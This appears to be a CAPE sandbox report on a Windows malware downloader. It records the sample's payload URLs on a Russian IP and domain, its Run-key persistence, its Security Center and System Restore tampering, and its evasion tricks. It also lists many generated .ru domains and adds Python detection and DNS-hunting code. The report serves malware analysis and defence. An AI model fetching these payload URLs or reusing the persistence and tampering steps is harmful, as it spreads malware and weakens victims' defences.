2019-01-10 03:40:44,171 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:44,280 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:40:44,405 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:44,515 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:44,562 [root] INFO: Monitor successfully loaded in process with pid 2612.
2019-01-10 03:40:44,936 [root] DEBUG: ProtectionHandler: Address: 0x59d9d0, RegionSize: 0x43d1
2019-01-10 03:40:44,951 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x59d9d0
2019-01-10 03:40:44,951 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x59d9d0, AllocationSize: 0x43d1, ThreadId: 0xa64
2019-01-10 03:40:44,951 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x59d9d0 and Type=0x0.
2019-01-10 03:40:44,951 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x59d9d0, size 0 with Callback 0x74492ea0, ThreadHandle = 0xac.
2019-01-10 03:40:44,951 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x59d9d0
2019-01-10 03:40:44,967 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x59d9d0
2019-01-10 03:40:44,967 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x59d9d0.
2019-01-10 03:40:44,967 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x570000, size 0x31da1).
2019-01-10 03:40:44,967 [root] DEBUG: DumpPEsInRange: Scanning range 0x570000 - 0x5a1da1.
2019-01-10 03:40:44,967 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x570000-0x5a1da1.
2019-01-10 03:40:44,983 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\chdswdpfa\CAPE\2612_98344401010412019
2019-01-10 03:40:44,997 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2612_98344401010412019
2019-01-10 03:40:44,997 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x59d9d0 - 0x5a1da1.
2019-01-10 03:40:44,997 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x59d9d0.
2019-01-10 03:40:44,997 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x570000.
2019-01-10 03:40:44,997 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:40:44,997 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:40:45,013 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:40:45,013 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:40:45,013 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:40:45,013 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:40:45,013 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:40:45,029 [root] INFO: Added new CAPE file to list with path: C:\chdswdpfa\CAPE\2612_1445401010412019
2019-01-10 03:40:45,029 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:40:45,029 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:40:45,029 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:40:45,045 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:40:45,122 [root] INFO: Announced 32-bit process name: 1498839355.exe pid: 928
2019-01-10 03:40:45,122 [root] INFO: Added new process to list with pid: 928
2019-01-10 03:40:45,138 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:40:45,170 [lib.api.process] INFO: 32-bit DLL to inject is C:\chdswdpfa\dll\OwfFKZsM.dll, loader C:\chdswdpfa\bin\oXdzSeo.exe
2019-01-10 03:40:45,200 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 928
2019-01-10 03:40:45,247 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:40:45,279 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:40:45,309 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:40:45,357 [root] INFO: Disabling sleep skipping.
2019-01-10 03:40:45,388 [root] INFO: Monitor successfully loaded in process with pid 928.
2019-01-10 03:40:46,089 [root] INFO: Notified of termination of process with pid 2612.
2019-01-10 03:40:47,135 [root] INFO: Process with pid 2612 has terminated
2019-01-10 03:43:06,038 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 03:43:06,131 [root] INFO: Created shutdown mutex.
2019-01-10 03:43:07,270 [root] INFO: Setting terminate event for process 2908.
2019-01-10 03:43:07,973 [root] INFO: Setting terminate event for process 2128.
2019-01-10 03:43:08,628 [root] INFO: Setting terminate event for process 2744.
2019-01-10 03:43:09,188 [root] INFO: Setting terminate event for process 928.
2019-01-10 03:43:09,798 [root] INFO: Shutting down package.
2019-01-10 03:43:09,859 [root] INFO: Stopping auxiliary modules.
2019-01-10 03:43:09,953 [root] INFO: Finishing auxiliary modules.
2019-01-10 03:43:10,016 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 03:43:10,094 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-01-10 03:39:36 2019-01-10 03:43:25

File Details

File Name 2019-01-08-malware-downloader.exe
File Size 152576 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 44a81be517e01ab33abdba541a239b6e
SHA1 2890c3be34e4189fe0a11b4e60ff2b3203fcdd2a
SHA256 056b7eb0c06645e1f51ed77f4fa18a4bed47135108371a84f0482f141ae0d769
SHA512 3361688b857d7e5db7fb5c9606a8e17c1487fb7e6dda9ed69d3c6c89ed94c51abb7e935971d35884bd71a8a55cc1bf436ea28997d404b50f91921895438515a0
CRC32 3328869D
Ssdeep 3072:MupWc+2g2yM2BSwgtNSGv551zDb/Wvn006luxHE:MupxMcBDSGlzDbuvn00c
TrID
  • 34.7% (.EXE) Win32 EXE PECompact compressed (generic) (41569/9/9)
  • 26.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 23.1% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 5.5% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 3.7% (.EXE) Win32 Executable (generic) (4508/7/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2952 triggered the Yara rule 'embedded_pe'
Hit: PID 2952 triggered the Yara rule 'shellcode'
Hit: PID 2908 triggered the Yara rule 'embedded_pe'
Hit: PID 2908 triggered the Yara rule 'shellcode'
Hit: PID 2776 triggered the Yara rule 'embedded_pe'
Hit: PID 2776 triggered the Yara rule 'shellcode'
Hit: PID 3068 triggered the Yara rule 'embedded_pe'
Hit: PID 3068 triggered the Yara rule 'shellcode'
Hit: PID 2936 triggered the Yara rule 'embedded_pe'
Hit: PID 2936 triggered the Yara rule 'shellcode'
Hit: PID 2744 triggered the Yara rule 'embedded_pe'
Hit: PID 2744 triggered the Yara rule 'shellcode'
Hit: PID 2612 triggered the Yara rule 'embedded_pe'
Hit: PID 2612 triggered the Yara rule 'shellcode'
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
DeletedFile: C:\Windows\495060393034060\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3180725230.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
DeletedFile: C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
DeletedFile: C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1015321578.exe:Zone.Identifier
DeletedFile: C:\Users\user\AppData\Local\Temp\1498839355.exe:Zone.Identifier
A process attempted to delay the analysis task.
Process: winsvcs.exe tried to sleep 901 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: BdTTBslVE5X4r.exe/atexit
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/1.exe
suspicious_request: http://92.63.197.48/2.exe
suspicious_request: http://92.63.197.48/3.exe
suspicious_request: http://92.63.197.48/4.exe
suspicious_request: http://92.63.197.48/5.exe
Performs some HTTP requests
url: http://slpsrgpsrhojifdij.ru/1.exe
url: http://slpsrgpsrhojifdij.ru/2.exe
url: http://slpsrgpsrhojifdij.ru/3.exe
url: http://slpsrgpsrhojifdij.ru/4.exe
url: http://slpsrgpsrhojifdij.ru/5.exe
url: http://92.63.197.48/1.exe
url: http://92.63.197.48/2.exe
url: http://92.63.197.48/3.exe
url: http://92.63.197.48/4.exe
url: http://92.63.197.48/5.exe
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: BdTTBslVE5X4r.exe (2952) called API NtClose 500152 times
Spam: winsvcs.exe (2908) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
Creates a hidden or system file
file: C:\Windows\495060393034060
file: C:\Windows\495060393034060\winsvcs.exe
file: C:\Windows\806084767800850
file: C:\Windows\806084767800850\winsvcs.exe
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\495060393034060\winsvcs.exe
Attempts to disable System Restore
Drops a binary and executes it
binary: C:\Windows\806084767800850\winsvcs.exe
binary: C:\Windows\495060393034060\winsvcs.exe
binary: C:\Users\user\AppData\Local\Temp\3971618177.exe
binary: C:\Users\user\AppData\Local\Temp\1015321578.exe
binary: C:\Users\user\AppData\Local\Temp\3895820593.exe
Attempts to modify or disable Security Center warnings
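The signatures above describe the sample's behaviour in prose. The Python below is an added example, not part of the CAPE report, that turns four of them into rules over a generic event record (kind, image, target, data). The event shape is a simplification of a host telemetry stream, not any product's schema. The malicious records reuse the paths, Run key and Security Center / SystemRestore values from this report (the data written to those values is not shown in the report and is assumed to be "1"); the two benign records at the end are invented controls.

```python
# Added example (not from the CAPE report): the behavioural signatures above
# as rules over a generic event record. The Event shape is a simplification
# of a host telemetry stream, not any product's schema.
import re
from collections import Counter
from dataclasses import dataclass

# A digits-only folder directly under C:\Windows, e.g. C:\Windows\495060393034060\winsvcs.exe
NUMERIC_WINDOWS_DIR = re.compile(r"^c:\\windows\\\d+\\[^\\]+\.exe$", re.I)
RUN_KEY = re.compile(r"\\microsoft\\windows\\currentversion\\run\\", re.I)
# Security Center *Override / *DisableNotify values and SystemRestore\DisableSR
TAMPER_VALUE = re.compile(
    r"\\(?:security center\\(?:antivirus|updates|firewall|autoupdate)(?:override|disablenotify)"
    r"|systemrestore\\disablesr)$", re.I)
ZONE_ID = re.compile(r":zone\.identifier$", re.I)   # the Mark-of-the-Web stream

@dataclass(frozen=True)
class Event:
    kind: str        # "reg_set", "file_create" or "file_delete"
    image: str       # process that performed the action
    target: str      # registry key\value, or file path
    data: str = ""   # registry data for reg_set

def match_rules(e):
    """Names of every rule a single event satisfies (empty list if none)."""
    hits = []
    if e.kind == "reg_set":
        if RUN_KEY.search(e.target) and NUMERIC_WINDOWS_DIR.match(e.data.strip('"')):
            hits.append("run_key_points_to_numeric_windows_dir")
        if TAMPER_VALUE.search(e.target):
            hits.append("security_center_or_system_restore_tamper")
    elif e.kind == "file_create" and NUMERIC_WINDOWS_DIR.match(e.target):
        hits.append("exe_dropped_in_numeric_windows_dir")
    elif e.kind == "file_delete" and ZONE_ID.search(e.target):
        hits.append("mark_of_the_web_removed")
    return hits

def triage(events):
    """Per-rule hit counts plus the sorted set of images that triggered any rule."""
    counts, offenders = Counter(), set()
    for e in events:
        for rule in match_rules(e):
            counts[rule] += 1
            offenders.add(e.image)
    return dict(counts), sorted(offenders)

DROPPER = r"C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe"
WINSVCS = r"C:\Windows\495060393034060\winsvcs.exe"
RUN_VALUE = r"\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services"
SAMPLE_EVENTS = [  # constructed from the report's own paths and keys
    Event("file_create", DROPPER, WINSVCS),
    Event("file_delete", DROPPER, DROPPER + ":Zone.Identifier"),
    Event("reg_set", WINSVCS, r"HKCU\Software" + RUN_VALUE, r"C:\Windows\806084767800850\winsvcs.exe"),
    Event("reg_set", WINSVCS, r"HKLM\SOFTWARE\Wow6432Node" + RUN_VALUE, r"C:\Windows\806084767800850\winsvcs.exe"),
    # data "1" is assumed: the report lists the values written, not their contents
    Event("reg_set", WINSVCS, r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride", "1"),
    Event("reg_set", WINSVCS, r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR", "1"),
    Event("file_create", WINSVCS, r"C:\Windows\806084767800850\winsvcs.exe"),
    # invented benign controls: an ordinary Run entry and an ordinary temp file
    Event("reg_set", r"C:\Program Files\Vendor\Updater.exe",
          r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
          r"C:\Program Files\Vendor\Updater.exe"),
    Event("file_create", r"C:\Windows\explorer.exe", r"C:\Users\user\AppData\Local\Temp\report.tmp"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The Run value name "Microsoft Windows Services" is deliberately not part of the rule: names are trivially changed, whereas a digits-only directory under C:\Windows and writes to the Security Center and DisableSR values are the stable parts of what the report shows. Whether the Zone.Identifier deletion is visible at all depends on the telemetry source recording operations on alternate data streams.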

Hosts

Direct IP Country Name
N 92.63.197.48 Russian Federation
Y 8.8.8.8 United States

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru A 92.63.197.48
osheoufhusheoghuesd.ru NXDOMAIN
ofheofosugusghuhush.ru
suieiusiueiuiuushgf.ru
fuiueufiiehfueghuhf.ru
sisoefjsuhuhaudhhed.ru
opllforgirsoofuhohu.ru
eooeoeooejesfiehfii.ru
oefosfishiudhiusegf.ru
aaeiauebfaneifuaeif.ru
naibfiahdiauehihhre.ru
auaeuiihaehifhahaud.ru
oieoaidhhaidhiehheg.ru
fisiuuiedesubdibesd.ru
efiiuehdiahiuediaug.ru
sfiushidhseiugiuseh.ru
oeiieieisijdingisgf.ru
aiisiaueuefiuhiehgu.ru
sfsiuhieghaughaoeho.ru
hpptlhptdkoodsokdke.ru
eneebgieeiieieiddrt.ru
eniaebivaiebifaibef.ru
mmginsiridnsinnsgir.ru
gmndaudnahgahghaohh.ru
aefaidihabevbabifba.ru
rgijirshisjriijdijh.ru
aiehazegfageigfzgei.ru
foaeodheuabguaegubr.ru
guhaohadueoanavbvbf.ru
orsodaououaebufbeob.ru
eaiiakeiohoueghoaur.ru
naiebiaifzgfaezgdzr.ru
gaeuhdobaoebuagoaoe.ru
giuahfoaoeubfouaena.ru
rgsouhdoauenodaeufb.ru
eoguaonedonaodabobg.ru
gouaondoaudbaebobgu.ru
giohuoaehdoueofbaur.ru
gnaoedoaoounauubueu.ru
gbobaebaodebuoueofu.ru
srgouosehohedohaeoh.ru
goauhoednoaueouabbe.ru
gnaednouebaoubefoub.ru
plpaedjaofheagoahdg.ru
guaeudueaennnaenuen.ru
rgoonedoauneuoebuae.ru
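Every name the sample looked up has the same shape: one label of lowercase letters under .ru. Exactly one resolved (to 92.63.197.48), one came back NXDOMAIN and the rest got no answer. The Python below is an added example, not part of the report: it parses the DNS table as the sandbox exports it (the "[VT]" link labels are dropped), measures that shape and derives a hunting regex from it. The control names at the end are constructed and should not match. The derived length band reflects this one run only and is not a claim about the family.

```python
# Added example (not from the CAPE report): parse the DNS table as exported,
# derive the shape the queried names share, and turn it into a hunting regex.
import re

DNS_TABLE = """\
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]
osheoufhusheoghuesd.ru [VT] NXDOMAIN [VT]
ofheofosugusghuhush.ru [VT]
suieiusiueiuiuushgf.ru [VT]
fuiueufiiehfueghuhf.ru [VT]
sisoefjsuhuhaudhhed.ru [VT]
opllforgirsoofuhohu.ru [VT]
eooeoeooejesfiehfii.ru [VT]
oefosfishiudhiusegf.ru [VT]
aaeiauebfaneifuaeif.ru [VT]
naibfiahdiauehihhre.ru [VT]
auaeuiihaehifhahaud.ru [VT]
oieoaidhhaidhiehheg.ru [VT]
fisiuuiedesubdibesd.ru [VT]
efiiuehdiahiuediaug.ru [VT]
sfiushidhseiugiuseh.ru [VT]
oeiieieisijdingisgf.ru [VT]
aiisiaueuefiuhiehgu.ru [VT]
sfsiuhieghaughaoeho.ru [VT]
hpptlhptdkoodsokdke.ru [VT]
eneebgieeiieieiddrt.ru [VT]
eniaebivaiebifaibef.ru [VT]
mmginsiridnsinnsgir.ru [VT]
gmndaudnahgahghaohh.ru [VT]
aefaidihabevbabifba.ru [VT]
rgijirshisjriijdijh.ru [VT]
aiehazegfageigfzgei.ru [VT]
foaeodheuabguaegubr.ru [VT]
guhaohadueoanavbvbf.ru [VT]
orsodaououaebufbeob.ru [VT]
eaiiakeiohoueghoaur.ru [VT]
naiebiaifzgfaezgdzr.ru [VT]
gaeuhdobaoebuagoaoe.ru [VT]
giuahfoaoeubfouaena.ru [VT]
rgsouhdoauenodaeufb.ru [VT]
eoguaonedonaodabobg.ru [VT]
gouaondoaudbaebobgu.ru [VT]
giohuoaehdoueofbaur.ru [VT]
gnaoedoaoounauubueu.ru [VT]
gbobaebaodebuoueofu.ru [VT]
srgouosehohedohaeoh.ru [VT]
goauhoednoaueouabbe.ru [VT]
gnaednouebaoubefoub.ru [VT]
plpaedjaofheagoahdg.ru [VT]
guaeudueaennnaenuen.ru [VT]
rgoonedoauneuoebuae.ru [VT]
"""

def parse_dns_table(text):
    """(name, rtype, answer) per row; rtype is 'A', 'NXDOMAIN' or None (no answer logged)."""
    rows = []
    for line in text.splitlines():
        tokens = [t for t in line.split() if t != "[VT]"]  # drop the report's link labels
        if not tokens:
            continue
        if len(tokens) >= 3 and tokens[1] == "A":
            rows.append((tokens[0], "A", tokens[2]))
        elif len(tokens) >= 2 and tokens[1] == "NXDOMAIN":
            rows.append((tokens[0], "NXDOMAIN", None))
        else:
            rows.append((tokens[0], None, None))
    return rows

def label_shape(rows):
    """Label length band, charset, TLDs and resolution outcome of the queried names."""
    labels = [n.rsplit(".", 1)[0] for n, _, _ in rows]
    return {
        "count": len(rows),
        "min_len": min(len(l) for l in labels),
        "max_len": max(len(l) for l in labels),
        "lowercase_alpha": all(l.isascii() and l.isalpha() and l.islower() for l in labels),
        "tlds": {n.rsplit(".", 1)[1] for n, _, _ in rows},
        "resolved": {n: a for n, t, a in rows if t == "A"},
        "nxdomain": sum(t == "NXDOMAIN" for _, t, _ in rows),
        "unanswered": sum(t is None for _, t, _ in rows),
    }

def shape_pattern(shape):
    """Hunting regex for the observed shape. Caveat: a legitimate name of the same
    length band under the same TLD matches too, so use it to pivot through DNS
    logs, not as a blocklist."""
    tlds = "|".join(sorted(re.escape(t) for t in shape["tlds"]))
    return re.compile(rf"^[a-z]{{{shape['min_len']},{shape['max_len']}}}\.(?:{tlds})$")

def hunt(names, pattern):
    return [n for n in names if pattern.match(n)]

# constructed control names that must not match the derived pattern
CONTROL_NAMES = ["yandex.ru", "microsoft.com", "download.windowsupdate.com", "slpsrgpsrhojifdij.com"]
```

Only one of the 46 names resolved, and the TCP table further down shows every connection going to that single host on port 80, so the pattern earns its keep by finding other hosts that queried names of the same shape even where those lookups failed.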

Summary

Files

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
C:\Windows\495060393034060\winsvcs.exe
C:\Windows\495060393034060
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
C:\Windows\495060393034060\msvcr100.dll
C:\Windows\495060393034060\winsvcs.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3180725230.exe:Zone.Identifier
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\806084767800850\winsvcs.exe
C:\Windows\806084767800850
C:\Windows\806084767800850\msvcr100.dll
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3971618177.exe
C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3344735343.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1498839355.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
\Device\KsecDD
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Windows\495060393034060\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3971618177.exe
C:\Users\user\AppData\Local\Temp\3344735343.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
C:\Windows\495060393034060\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3180725230.exe:Zone.Identifier
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1015321578.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1498839355.exe:Zone.Identifier

Registry Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
